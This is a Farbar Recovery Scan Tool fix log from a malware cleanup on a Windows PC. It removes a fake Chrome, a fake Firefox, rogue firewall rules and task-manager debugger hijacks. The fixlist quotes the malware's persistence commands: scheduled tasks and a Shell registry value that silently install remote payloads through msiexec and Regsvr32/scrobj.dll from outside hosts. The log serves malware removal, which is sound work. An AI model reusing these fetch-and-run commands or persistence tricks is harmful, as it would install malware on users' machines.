Fix result of Farbar Recovery Scan Tool (x64) Version: 27-04-2017
Ran by Arekcipa (30-04-2017 14:33:04) Run:1
Running from C:\Users\Arekcipa\Downloads
Loaded Profiles: Arekcipa (Available Profiles: Arekcipa)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== ATTENTION
RemoveDirectory: C:\Program Files (x86)\Doeye
Task: {7BE3337D-631A-4D0C-8C69-A5F7CDA67D79} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {A40E3F91-5995-4A8A-8699-53EFAA9D14A6} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== scrobj.dll
Task: {E40686E5-FC3F-44C2-9348-C26991415F62} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== scrobj.dll
C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{D6635014-F9FD-489A-A18A-D2C4BCD33616}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe
FirewallRules: [{8F2CADE9-7620-4E1E-978E-84231DE2E209}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{70086F64-9FA6-483E-BD52-F45BDBB50643}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Arekcipa\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Arekcipa\AppData\Local\Firefox
HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== /q
HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE ->
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== ATTENTION
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108720 2017-04-26] () <==== ATTENTION
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Arekcipa\AppData\Local\Mozilla
C:\Users\Arekcipa\AppData\Roaming\Mozilla
C:\Users\Arekcipa\AppData\Roaming\Profiles
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-252974029-621322211-1437129156-1001_Classes\ChromeHTML => key removed successfully
"C:\Program Files (x86)\Doeye" => removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BE3337D-631A-4D0C-8C69-A5F7CDA67D79} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BE3337D-631A-4D0C-8C69-A5F7CDA67D79} => key removed successfully
C:\Windows\System32\Tasks\T0528 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T0528 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A40E3F91-5995-4A8A-8699-53EFAA9D14A6} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A40E3F91-5995-4A8A-8699-53EFAA9D14A6} => key removed successfully
C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E40686E5-FC3F-44C2-9348-C26991415F62} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E40686E5-FC3F-44C2-9348-C26991415F62} => key removed successfully
C:\Windows\System32\Tasks\PowerWord-SCT-JT => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => key removed successfully
C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => moved successfully
"C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk" => not found.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => moved successfully
C:\Users\Public\Desktop\Google Chrome.lnk => moved successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D6635014-F9FD-489A-A18A-D2C4BCD33616} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8F2CADE9-7620-4E1E-978E-84231DE2E209} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{70086F64-9FA6-483E-BD52-F45BDBB50643} => value removed successfully
"C:\Program Files (x86)\Firefox" => removed successfully.
"C:\Users\Arekcipa\AppData\Roaming\Firefox" => removed successfully.
"C:\Users\Arekcipa\AppData\Local\Firefox" => removed successfully.
HKU\S-1-5-21-252974029-621322211-1437129156-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully
HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE => value removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => key removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => key removed successfully
HKU\S-1-5-21-252974029-621322211-1437129156-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => key removed successfully
HKLM\System\CurrentControlSet\Services\FirefoxU => key removed successfully
FirefoxU => service removed successfully
HKLM\System\CurrentControlSet\Services\wfpcapture => key removed successfully
wfpcapture => service removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => moved successfully
"C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk" => not found.
C:\Users\Public\Desktop\Mozilla Firefox.lnk => moved successfully
HKCU\Software\Mozilla => key not found.
HKCU\Software\MozillaPlugins => key not found.
HKLM\SOFTWARE\Mozilla => key not found.
HKLM\SOFTWARE\MozillaPlugins => key not found.
HKLM\SOFTWARE\Wow6432Node\Mozilla => key removed successfully
HKLM\SOFTWARE\Wow6432Node\mozilla.org => key not found.
HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => key removed successfully
"C:\Users\Arekcipa\AppData\Local\Mozilla" => not found.
C:\Users\Arekcipa\AppData\Roaming\Mozilla => moved successfully
"C:\Users\Arekcipa\AppData\Roaming\Profiles" => not found.

=========== EmptyTemp: ==========
BITS transfer queue => 820412 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 13846607 B
Java, Flash, Steam htmlcache => 233739164 B
Windows/system/drivers => 5732072 B
Edge => 0 B
Chrome => 791056854 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 1516 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 501204 B
Arekcipa => 694450776 B
RecycleBin => 0 B
EmptyTemp: => 1.6 GB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 14:34:06 ====